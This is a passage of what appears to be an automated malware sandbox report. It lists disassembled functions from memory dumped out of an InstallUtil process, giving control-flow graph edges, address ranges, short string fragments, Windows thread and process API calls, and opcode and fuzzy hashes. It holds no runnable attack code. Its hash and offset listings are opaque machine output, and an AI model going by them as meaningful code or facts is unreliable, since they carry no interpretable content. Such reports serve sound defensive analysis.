923->926 927 6a3fb98-6a3fb9b 923->927 924->923 926->927 935 6a3fbb1-6a3fbb4 927->935 936 6a3fb9d-6a3fbac 927->936 937 6a3f9b3-6a3f9b6 928->937 938 6a3f981-6a3f9ae 928->938 933 6a3faab-6a3faae 930->933 934 6a3fa9f-6a3faa6 930->934 931->930 942 6a3fab0-6a3fab9 933->942 943 6a3fac4-6a3fac7 933->943 934->933 944 6a3fbb6-6a3fbbb 935->944 945 6a3fbcd-6a3fbd0 935->945 936->935 947 6a3f9c9-6a3f9cc 937->947 948 6a3f9b8-6a3f9c4 937->948 938->937 952 6a3fabf 942->952 953 6a3f9ee-6a3f9f7 942->953 954 6a3fae0-6a3fae3 943->954 955 6a3fac9-6a3fadb 943->955 944->859 957 6a3fbd2-6a3fbe9 945->957 958 6a3fbee-6a3fbf1 945->958 950 6a3f9d9-6a3f9dc 947->950 951 6a3f9ce-6a3f9d4 947->951 948->947 962 6a3f9e9-6a3f9ec 950->962 963 6a3f9de-6a3f9e4 950->963 951->950 952->943 953->876 965 6a3f9fd-6a3fa04 953->965 954->870 954->879 955->954 957->958 958->866 967 6a3fbf3 958->967 962->953 969 6a3fa09-6a3fa0c 962->969 963->962 965->969 967->861 969->896 974 6a3fa4a-6a3fa4d 969->974 971->974 974->942 976 6a3fa4f-6a3fa52 974->976 976->891 976->903
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: H\-$5H\-$>H\-$oH\-$xH\-
                                • API String ID: 0-1507940824
                                • Opcode ID: d36d63491f0e8f25fc2e813cae793453890b6c5acc76b121c3854753124e220a
                                • Instruction ID: c463406e845273ce2279b95c7a1b85b4a8e629b36c03ff3100f8f34eb638f9a3
                                • Opcode Fuzzy Hash: d36d63491f0e8f25fc2e813cae793453890b6c5acc76b121c3854753124e220a
                                • Instruction Fuzzy Hash: 0EA14374F101199FEFA4EBACD4A07AEB6F6EB89350F204426E405EF395DA34DC418B61
                                Function 06A3D520 Relevance: 6.5, Strings: 5, Instructions: 280COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1153 6a3d520-6a3d545 1155 6a3d547-6a3d54a 1153->1155 1156 6a3d570-6a3d573 1155->1156 1157 6a3d54c-6a3d56b 1155->1157 1158 6a3dfb5-6a3dfb7 1156->1158 1159 6a3d579-6a3d5b9 1156->1159 1157->1156 1161 6a3dfb9 1158->1161 1162 6a3dfbe-6a3dfc1 1158->1162 1168 6a3d5e3 1159->1168 1169 6a3d5bb-6a3d5c7 1159->1169 1161->1162 1162->1155 1163 6a3dfc7-6a3dfd1 1162->1163 1172 6a3d5e9-6a3d61f 1168->1172 1170 6a3d5d1-6a3d5d7 1169->1170 1171 6a3d5c9-6a3d5cf 1169->1171 1173 6a3d5e1 1170->1173 1171->1173 1177 6a3d62a-6a3d62c 1172->1177 1173->1172 1178 6a3d644-6a3d6cd 1177->1178 1179 6a3d62e-6a3d634 1177->1179 1191 6a3d712-6a3d748 1178->1191 1192 6a3d6cf-6a3d70b 1178->1192 1180 6a3d636 1179->1180 1181 6a3d638-6a3d63a 1179->1181 1180->1178 1181->1178 1199 6a3d74a-6a3d786 1191->1199 1200 6a3d78d-6a3d7c3 1191->1200 1192->1191 1199->1200 1207 6a3d7c5-6a3d801 1200->1207 1208 6a3d808-6a3d83e 1200->1208 1207->1208 1215 6a3d883-6a3d891 1208->1215 1216 6a3d840-6a3d87c 1208->1216 1217 6a3d893-6a3d89c 1215->1217 1218 6a3d8a1-6a3d918 1215->1218 1216->1215 1217->1163 1225 6a3d971-6a3d986 1218->1225 1226 6a3d91a-6a3d93e 1218->1226 1225->1158 1231 6a3d960-6a3d96f 1226->1231 1232 6a3d940-6a3d955 1226->1232 1231->1225 1231->1226 1232->1231
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: /t\-$7w\-$Ot\-$~w\-$u\-
                                • API String ID: 0-1551691544
                                • Opcode ID: 0c21ac7477ec0e64db8556d4f10c5911620e40ec85e6c9766f5c18f01c9131a1
                                • Instruction ID: f50766901d092b43c4577afa301621214acb777f47386340b87f168d9cdcfb0c
                                • Opcode Fuzzy Hash: 0c21ac7477ec0e64db8556d4f10c5911620e40ec85e6c9766f5c18f01c9131a1
                                • Instruction Fuzzy Hash: EEC1ED74F0126A8FDB68EF64D8907DEB7F2BF89340F1045A9D409AB344EA709D818F91
                                Function 06A3D510 Relevance: 6.5, Strings: 5, Instructions: 217COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1236 6a3d510-6a3d511 1237 6a3d514-6a3d517 1236->1237 1238 6a3d519-6a3d51e 1236->1238 1237->1238 1239 6a3d520-6a3d525 1238->1239 1240 6a3d526-6a3d545 1238->1240 1239->1240 1241 6a3d547-6a3d54a 1240->1241 1242 6a3d570-6a3d573 1241->1242 1243 6a3d54c-6a3d56b 1241->1243 1244 6a3dfb5-6a3dfb7 1242->1244 1245 6a3d579-6a3d589 1242->1245 1243->1242 1247 6a3dfb9 1244->1247 1248 6a3dfbe-6a3dfc1 1244->1248 1252 6a3d593-6a3d5a1 1245->1252 1247->1248 1248->1241 1249 6a3dfc7-6a3dfd1 1248->1249 1253 6a3d5ac-6a3d5b9 1252->1253 1254 6a3d5e3 1253->1254 1255 6a3d5bb-6a3d5c7 1253->1255 1258 6a3d5e9-6a3d607 1254->1258 1256 6a3d5d1-6a3d5d7 1255->1256 1257 6a3d5c9-6a3d5cf 1255->1257 1259 6a3d5e1 1256->1259 1257->1259 1262 6a3d611-6a3d61f 1258->1262 1259->1258 1263 6a3d62a-6a3d62c 1262->1263 1264 6a3d644-6a3d6cd 1263->1264 1265 6a3d62e-6a3d634 1263->1265 1277 6a3d712-6a3d748 1264->1277 1278 6a3d6cf-6a3d70b 1264->1278 1266 6a3d636 1265->1266 1267 6a3d638-6a3d63a 1265->1267 1266->1264 1267->1264 1285 6a3d74a-6a3d786 1277->1285 1286 6a3d78d-6a3d7c3 1277->1286 1278->1277 1285->1286 1293 6a3d7c5-6a3d801 1286->1293 1294 6a3d808-6a3d83e 1286->1294 1293->1294 1301 6a3d883-6a3d891 1294->1301 1302 6a3d840-6a3d87c 1294->1302 1303 6a3d893-6a3d89c 1301->1303 1304 6a3d8a1-6a3d918 1301->1304 1302->1301 1303->1249 1311 6a3d971-6a3d986 1304->1311 1312 6a3d91a-6a3d93e 1304->1312 1311->1244 1317 6a3d960-6a3d96f 1312->1317 1318 6a3d940-6a3d955 1312->1318 1317->1311 1317->1312 1318->1317
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: /t\-$7w\-$Ot\-$~w\-$u\-
                                • API String ID: 0-1551691544
                                • Opcode ID: bb85304092ee6cbb6db9f8fde652cffa987bac9f9f6393b14e28f2e1aefd936c
                                • Instruction ID: e19e9df691ba2c4af2c1a817b95af8c7a3a8a0982ccc20a79f7d79ff8dca1e5b
                                • Opcode Fuzzy Hash: bb85304092ee6cbb6db9f8fde652cffa987bac9f9f6393b14e28f2e1aefd936c
                                • Instruction Fuzzy Hash: 4A91FD74E012699FDBA8EB64D891BDDB7F1FF89700F1044A9D419AB340EA709D80CF91
                                Function 030BB14B Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1358 30bb14b-30bb1df GetCurrentProcess 1363 30bb1e8-30bb21c GetCurrentThread 1358->1363 1364 30bb1e1-30bb1e7 1358->1364 1365 30bb21e-30bb224 1363->1365 1366 30bb225-30bb259 GetCurrentProcess 1363->1366 1364->1363 1365->1366 1368 30bb25b-30bb261 1366->1368 1369 30bb262-30bb27a 1366->1369 1368->1369 1380 30bb27d call 30bb32f 1369->1380 1381 30bb27d call 30bb320 1369->1381 1372 30bb283-30bb2b2 GetCurrentThreadId 1373 30bb2bb-30bb31d 1372->1373 1374 30bb2b4-30bb2ba 1372->1374 1374->1373 1380->1372 1381->1372
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 030BB1CE
                                • GetCurrentThread.KERNEL32 ref: 030BB20B
                                • GetCurrentProcess.KERNEL32 ref: 030BB248
                                • GetCurrentThreadId.KERNEL32 ref: 030BB2A1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3408345631.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_30b0000_InstallUtil.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 9925293fed651ae045921a35d5949c1430b8bbca6c0c1209de09967b0c6d5350
                                • Instruction ID: 99c631cb4d5ab4187468efa69b4672e9138d657f6d0342bca2e09a92c07d5213
                                • Opcode Fuzzy Hash: 9925293fed651ae045921a35d5949c1430b8bbca6c0c1209de09967b0c6d5350
                                • Instruction Fuzzy Hash: 7D5154B0901349CFEB54DFA9D548BDEBBF5FB88304F248419E509A7360DB34A944CB65
                                Function 030BB150 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1382 30bb150-30bb1df GetCurrentProcess 1386 30bb1e8-30bb21c GetCurrentThread 1382->1386 1387 30bb1e1-30bb1e7 1382->1387 1388 30bb21e-30bb224 1386->1388 1389 30bb225-30bb259 GetCurrentProcess 1386->1389 1387->1386 1388->1389 1391 30bb25b-30bb261 1389->1391 1392 30bb262-30bb27a 1389->1392 1391->1392 1403 30bb27d call 30bb32f 1392->1403 1404 30bb27d call 30bb320 1392->1404 1395 30bb283-30bb2b2 GetCurrentThreadId 1396 30bb2bb-30bb31d 1395->1396 1397 30bb2b4-30bb2ba 1395->1397 1397->1396 1403->1395 1404->1395
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 030BB1CE
                                • GetCurrentThread.KERNEL32 ref: 030BB20B
                                • GetCurrentProcess.KERNEL32 ref: 030BB248
                                • GetCurrentThreadId.KERNEL32 ref: 030BB2A1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3408345631.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_30b0000_InstallUtil.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: dbbee3fd887516ee241717a5f2ee3caf57a2e4802570f90896d1a3853a654a4d
                                • Instruction ID: dddb4d69ccd86ce29bb12699066caf1447b38c038c0dc2d9f9280995dceb21f0
                                • Opcode Fuzzy Hash: dbbee3fd887516ee241717a5f2ee3caf57a2e4802570f90896d1a3853a654a4d
                                • Instruction Fuzzy Hash: 7D5164B0901349CFEB54CFA9D548BDEBBF5FB88304F208419E409A7360DB346944CB65
                                Function 06A38337 Relevance: 4.0, Strings: 3, Instructions: 262COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1405 6a38337-6a38396 1408 6a38398-6a3839b 1405->1408 1409 6a383d5-6a383d8 1408->1409 1410 6a3839d-6a383ca 1408->1410 1411 6a38415-6a38418 1409->1411 1412 6a383da-6a383f9 1409->1412 1420 6a38480-6a384ad 1410->1420 1442 6a383d0 1410->1442 1414 6a38455-6a38458 1411->1414 1415 6a3841a-6a38439 1411->1415 1441 6a38401-6a38410 1412->1441 1416 6a3847b-6a3847e 1414->1416 1417 6a3845a-6a38476 1414->1417 1445 6a38441-6a38450 1415->1445 1416->1420 1421 6a384b4-6a384b7 1416->1421 1417->1416 1424 6a384b9-6a384e5 1420->1424 1453 6a384af 1420->1453 1423 6a384ea-6a384ed 1421->1423 1421->1424 1427 6a3850f-6a38511 1423->1427 1428 6a384ef-6a3850a 1423->1428 1424->1423 1434 6a38513 1427->1434 1435 6a38518-6a3851b 1427->1435 1428->1427 1434->1435 1435->1408 1440 6a38521-6a38530 1435->1440 1447 6a38536-6a3853c 1440->1447 1448 6a38699-6a386ac 1440->1448 1441->1411 1442->1409 1445->1414 1483 6a3853f call 6a386e0 1447->1483 1484 6a3853f call 6a386c9 1447->1484 1452 6a386b3 1448->1452 1455 6a386b4 1452->1455 1453->1421 1454 6a38545-6a3857a 1460 6a38580-6a38589 1454->1460 1461 6a38684-6a38693 1454->1461 1455->1455 1462 6a3858f-6a385e3 1460->1462 1463 6a386ae 1460->1463 1461->1447 1461->1448 1469 6a38672-6a3867e 1462->1469 1470 6a385e9-6a38620 call 6a38b61 1462->1470 1463->1452 1469->1460 1469->1461 1486 6a38622 call 6a38c68 1470->1486 1487 6a38622 call 6a38c78 1470->1487 1476 6a38628-6a38648 1488 6a3864a call 6a396a1 1476->1488 1489 6a3864a call 6a396b0 1476->1489 1479 6a38650-6a38652 1490 6a38655 call 6a3a320 1479->1490 1491 6a38655 call 6a3a330 1479->1491 1480 6a3865b-6a3865d 1480->1469 1481 6a3865f-6a3866b 1480->1481 1481->1469 1483->1454 1484->1454 1486->1476 1487->1476 1488->1479 1489->1479 1490->1480 1491->1480
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9^\-$P_\-$Y_\-
                                • API String ID: 0-50222206
                                • Opcode ID: cd7bc88a8a3f223b7c96e9db4ad9d24821b5ee1b3065f22629d40c676a5afb3f
                                • Instruction ID: 907bbfe5bb4d3e0dbb2f944682a9a6ba8f31e51e9652036fb76b758fdcda4fea
                                • Opcode Fuzzy Hash: cd7bc88a8a3f223b7c96e9db4ad9d24821b5ee1b3065f22629d40c676a5afb3f
                                • Instruction Fuzzy Hash: 29914F30B052594BDB59EBB9C4647AEB7F2AFC5300F148469E40AEB385EE78DC428791
                                Function 06A38378 Relevance: 4.0, Strings: 3, Instructions: 242COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1492 6a38378-6a38396 1493 6a38398-6a3839b 1492->1493 1494 6a383d5-6a383d8 1493->1494 1495 6a3839d-6a383ca 1493->1495 1496 6a38415-6a38418 1494->1496 1497 6a383da-6a383f9 1494->1497 1505 6a38480-6a384ad 1495->1505 1527 6a383d0 1495->1527 1499 6a38455-6a38458 1496->1499 1500 6a3841a-6a38439 1496->1500 1526 6a38401-6a38410 1497->1526 1501 6a3847b-6a3847e 1499->1501 1502 6a3845a-6a38476 1499->1502 1530 6a38441-6a38450 1500->1530 1501->1505 1506 6a384b4-6a384b7 1501->1506 1502->1501 1509 6a384b9-6a384e5 1505->1509 1538 6a384af 1505->1538 1508 6a384ea-6a384ed 1506->1508 1506->1509 1512 6a3850f-6a38511 1508->1512 1513 6a384ef-6a3850a 1508->1513 1509->1508 1519 6a38513 1512->1519 1520 6a38518-6a3851b 1512->1520 1513->1512 1519->1520 1520->1493 1525 6a38521-6a38530 1520->1525 1532 6a38536-6a3853c 1525->1532 1533 6a38699-6a386ac 1525->1533 1526->1496 1527->1494 1530->1499 1568 6a3853f call 6a386e0 1532->1568 1569 6a3853f call 6a386c9 1532->1569 1537 6a386b3 1533->1537 1540 6a386b4 1537->1540 1538->1506 1539 6a38545-6a3857a 1545 6a38580-6a38589 1539->1545 1546 6a38684-6a38693 1539->1546 1540->1540 1547 6a3858f-6a385e3 1545->1547 1548 6a386ae 1545->1548 1546->1532 1546->1533 1554 6a38672-6a3867e 1547->1554 1555 6a385e9-6a38620 call 6a38b61 1547->1555 1548->1537 1554->1545 1554->1546 1571 6a38622 call 6a38c68 1555->1571 1572 6a38622 call 6a38c78 1555->1572 1561 6a38628-6a38648 1573 6a3864a call 6a396a1 1561->1573 1574 6a3864a call 6a396b0 1561->1574 1564 6a38650-6a38652 1575 6a38655 call 6a3a320 1564->1575 1576 6a38655 call 6a3a330 1564->1576 1565 6a3865b-6a3865d 1565->1554 1566 6a3865f-6a3866b 1565->1566 1566->1554 1568->1539 1569->1539 1571->1561 1572->1561 1573->1564 1574->1564 1575->1565 1576->1565
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9^\-$P_\-$Y_\-
                                • API String ID: 0-50222206
                                • Opcode ID: b31bad9fd9f963bdc6daa811b19f6f949a227aac09fc95383dc3e47db3f1684f
                                • Instruction ID: cc7af3d52e35603378d5aad3e429e91f01336c430aeb1c532711ed58024007a0
                                • Opcode Fuzzy Hash: b31bad9fd9f963bdc6daa811b19f6f949a227aac09fc95383dc3e47db3f1684f
                                • Instruction Fuzzy Hash: 00813F34B112594BDB58EBB8C4607AEB6F6AFC9700F148429E40AEF384EF74DC428791
                                Function 06A3F610 Relevance: 4.0, Strings: 3, Instructions: 228COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1577 6a3f610-6a3f62e 1578 6a3f630-6a3f633 1577->1578 1579 6a3f640-6a3f643 1578->1579 1580 6a3f635-6a3f63f 1578->1580 1581 6a3f652-6a3f655 1579->1581 1582 6a3f645 1579->1582 1583 6a3f65b-6a3f696 1581->1583 1584 6a3f8ef-6a3f8f2 1581->1584 1639 6a3f645 call 6a3fbc3 1582->1639 1640 6a3f645 call 6a3fbbf 1582->1640 1592 6a3f8ba-6a3f8cd 1583->1592 1593 6a3f69c-6a3f6a8 1583->1593 1586 6a3f903-6a3f906 1584->1586 1587 6a3f8f4-6a3f8f8 1584->1587 1585 6a3f64b-6a3f64d 1585->1581 1588 6a3f929-6a3f92b 1586->1588 1589 6a3f908-6a3f924 1586->1589 1587->1583 1591 6a3f8fe 1587->1591 1594 6a3f932-6a3f935 1588->1594 1595 6a3f92d 1588->1595 1589->1588 1591->1586 1598 6a3f8cf 1592->1598 1600 6a3f6aa-6a3f6c3 1593->1600 1601 6a3f6c8-6a3f70c 1593->1601 1594->1578 1597 6a3f93b-6a3f945 1594->1597 1595->1594 1598->1584 1600->1598 1608 6a3f728-6a3f767 1601->1608 1609 6a3f70e-6a3f720 1601->1609 1612 6a3f87f-6a3f894 1608->1612 1613 6a3f76d-6a3f879 1608->1613 1609->1608 1612->1592 1613->1612 1639->1585 1640->1585
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CH\-$WH\-$[H\-
                                • API String ID: 0-2403036194
                                • Opcode ID: 5ed095fbd348708fc27486784584bfe668b6c87c80fa9dc306095edbc6a60ca9
                                • Instruction ID: c1beeaee003aa43b413f958be28d26124e159dfb9ea52473a603f95f8d0248c6
                                • Opcode Fuzzy Hash: 5ed095fbd348708fc27486784584bfe668b6c87c80fa9dc306095edbc6a60ca9
                                • Instruction Fuzzy Hash: CD816030E1035A8FDB58EFA5D45069EB7F2FF89304F208529E909EF354EB7098468B91
                                Function 06A3FBC3 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2077 6a3fbc3-6a3fbc8 2078 6a3fbcd-6a3fbd0 2077->2078 2079 6a3fbd2-6a3fbe9 2078->2079 2080 6a3fbee-6a3fbf1 2078->2080 2079->2080 2081 6a3fbf3 2080->2081 2082 6a3fc22-6a3fc25 2080->2082 2086 6a3fbf8 2081->2086 2083 6a3fc27-6a3fc2d 2082->2083 2084 6a3fc38-6a3fc3b 2082->2084 2087 6a3fc33 2083->2087 2088 6a3fae5-6a3faeb 2083->2088 2089 6a3fc45-6a3fc48 2084->2089 2090 6a3fc3d-6a3fc42 2084->2090 2094 6a3fbfd-6a3fc1d 2086->2094 2087->2084 2095 6a3faf1-6a3faf8 2088->2095 2096 6a3fd95-6a3fd9b 2088->2096 2092 6a3fc64-6a3fc67 2089->2092 2093 6a3fc4a-6a3fc59 2089->2093 2090->2089 2097 6a3fc89-6a3fc8c 2092->2097 2098 6a3fc69-6a3fc7e 2092->2098 2109 6a3fb3b-6a3fb3c 2093->2109 2110 6a3fc5f 2093->2110 2094->2082 2099 6a3fafd-6a3fb00 2095->2099 2100 6a3fc92-6a3fd25 2097->2100 2101 6a3fd2a-6a3fd2d 2097->2101 2129 6a3fa64-6a3fa67 2098->2129 2130 6a3fc84 2098->2130 2105 6a3fb02-6a3fb08 2099->2105 2106 6a3fb0d-6a3fb10 2099->2106 2100->2101 2111 6a3fd33-6a3fd36 2101->2111 2112 6a3fa54-6a3fa58 2101->2112 2105->2106 2107 6a3fb12-6a3fb31 2106->2107 2108 6a3fb36-6a3fb39 2106->2108 2107->2108 2108->2109 2115 6a3fb41-6a3fb44 2108->2115 2109->2115 2110->2092 2118 6a3fd52-6a3fd55 2111->2118 2119 6a3fd38-6a3fd4d 2111->2119 2116 6a3fa5a 2112->2116 2117 6a3fa0e-6a3fa43 2112->2117 2126 6a3fb46-6a3fb57 2115->2126 2127 6a3fb5c-6a3fb5f 2115->2127 2125 6a3fa5f-6a3fa62 2116->2125 2143 6a3fa71-6a3fa74 2117->2143 2192 6a3fa45 2117->2192 2122 6a3fd57-6a3fd73 2118->2122 2123 6a3fd78-6a3fd7a 2118->2123 2119->2118 2122->2123 2132 6a3fd81-6a3fd84 2123->2132 2133 6a3fd7c 2123->2133 2125->2129 2134 6a3fa6c-6a3fa6f 2125->2134 2126->2127 2136 6a3fb61-6a3fb63 2127->2136 2137 6a3fb66-6a3fb69 2127->2137 2129->2134 2130->2097 2141 6a3f973-6a3f976 2132->2141 2142 6a3fd8a-6a3fd94 2132->2142 2133->2132 2134->2143 2144 6a3fa79-6a3fa7c 2134->2144 2136->2137 2146 6a3fb76-6a3fb79 2137->2146 2147 6a3fb6b-6a3fb71 2137->2147 2141->2083 2151 6a3f97c-6a3f97f 2141->2151 2143->2144 2153 6a3fa9a-6a3fa9d 2144->2153 2154 6a3fa7e-6a3fa95 2144->2154 2149 6a3fb7b-6a3fb93 2146->2149 2150 6a3fb98-6a3fb9b 2146->2150 2147->2146 2149->2150 2158 6a3fbb1-6a3fbb4 2150->2158 2159 6a3fb9d-6a3fbac 2150->2159 2160 6a3f9b3-6a3f9b6 2151->2160 2161 6a3f981-6a3f9ae 2151->2161 2156 6a3faab-6a3faae 2153->2156 2157 6a3fa9f-6a3faa6 2153->2157 2154->2153 2165 6a3fab0-6a3fab9 2156->2165 2166 6a3fac4-6a3fac7 2156->2166 2157->2156 2158->2078 2167 6a3fbb6-6a3fbc1 2158->2167 2159->2158 2169 6a3f9c9-6a3f9cc 2160->2169 2170 6a3f9b8-6a3f9c4 2160->2170 2161->2160 2174 6a3fabf 2165->2174 2175 6a3f9ee-6a3f9f7 2165->2175 2176 6a3fae0-6a3fae3 2166->2176 2177 6a3fac9-6a3fadb 2166->2177 2167->2086 2172 6a3f9d9-6a3f9dc 2169->2172 2173 6a3f9ce-6a3f9d4 2169->2173 2170->2169 2183 6a3f9e9-6a3f9ec 2172->2183 2184 6a3f9de-6a3f9e4 2172->2184 2173->2172 2174->2166 2175->2096 2186 6a3f9fd-6a3fa04 2175->2186 2176->2088 2176->2099 2177->2176 2183->2175 2189 6a3fa09-6a3fa0c 2183->2189 2184->2183 2186->2189 2189->2117 2194 6a3fa4a-6a3fa4d 2189->2194 2192->2194 2194->2165 2196 6a3fa4f-6a3fa52 2194->2196 2196->2112 2196->2125
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: H\-$oH\-
                                • API String ID: 0-2512982594
                                • Opcode ID: 0f59810df606978c06cf48c22c3f7114b284c4c8d30d758c6c71c2059e1979c0
                                • Instruction ID: 0ec56b592c2738328d95697e6e2327fb9f9099243fc6ba1c815b3a9657fe1343
                                • Opcode Fuzzy Hash: 0f59810df606978c06cf48c22c3f7114b284c4c8d30d758c6c71c2059e1979c0
                                • Instruction Fuzzy Hash: 19415534F1011A9FEB98EBA8D4A07AEB6F6EBC5340F108429E509EF395DE34DC418B51
                                Function 06A37B08 Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2204 6a37b08-6a37b0a 2205 6a37b11 2204->2205 2206 6a37b0c-6a37b0e 2204->2206 2207 6a37b15 2205->2207 2206->2207 2208 6a37b10 2206->2208 2209 6a37b16 2207->2209 2210 6a37b8d-6a37b91 2207->2210 2208->2205 2211 6a37b17-6a37b1d 2209->2211 2212 6a37b1e-6a37b32 2209->2212 2213 6a37b93 2210->2213 2214 6a37bf2-6a37c3a 2210->2214 2211->2212 2216 6a37b34-6a37b36 2212->2216 2217 6a37b96-6a37be2 2213->2217 2219 6a37b38 2216->2219 2220 6a37b3d-6a37b40 2216->2220 2231 6a37be4-6a37be7 2217->2231 2232 6a37be9-6a37bf0 2217->2232 2219->2220 2220->2216 2221 6a37b42-6a37b70 2220->2221 2234 6a37b7a-6a37b7e 2221->2234 2231->2214 2232->2214 2232->2217 2235 6a37b85-6a37b8a 2234->2235 2235->2210
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CY\-$RY\-
                                • API String ID: 0-1908491093
                                • Opcode ID: 399f936f8ae12f5a0687e4a105098cf0094c22d27f022631420353c69dbca268
                                • Instruction ID: 4982ba912c990d7e6d6712a3798de63040f1bafd92e23dcd6a74dfe4265822f1
                                • Opcode Fuzzy Hash: 399f936f8ae12f5a0687e4a105098cf0094c22d27f022631420353c69dbca268
                                • Instruction Fuzzy Hash: 7131E875F012285FDB58EFB884517EE76F5EB88A50F104065E806FF341EA64DC4187E9
                                Function 06A37B18 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2236 6a37b18-6a37b32 2238 6a37b34-6a37b36 2236->2238 2239 6a37b38 2238->2239 2240 6a37b3d-6a37b40 2238->2240 2239->2240 2240->2238 2241 6a37b42-6a37b7e 2240->2241 2247 6a37b85-6a37b91 2241->2247 2249 6a37b93 2247->2249 2250 6a37bf2-6a37c3a 2247->2250 2251 6a37b96-6a37be2 2249->2251 2259 6a37be4-6a37be7 2251->2259 2260 6a37be9-6a37bf0 2251->2260 2259->2250 2260->2250 2260->2251
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CY\-$RY\-
                                • API String ID: 0-1908491093
                                • Opcode ID: 49a3e1c38055e7a5ea027f00b3f5cc2d561546eb84ad60bdaa6047806e0f8027
                                • Instruction ID: d5bbfc5d12c1bc48e760efdccf469872db4b5bd30926d284e76c4c45d58af5f0
                                • Opcode Fuzzy Hash: 49a3e1c38055e7a5ea027f00b3f5cc2d561546eb84ad60bdaa6047806e0f8027
                                • Instruction Fuzzy Hash: 1D31C375F012255FEB48EFB884517EEB6F5EB88A10F148069E906FF381EA30DC4187A5
                                Function 06A3E8F8 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
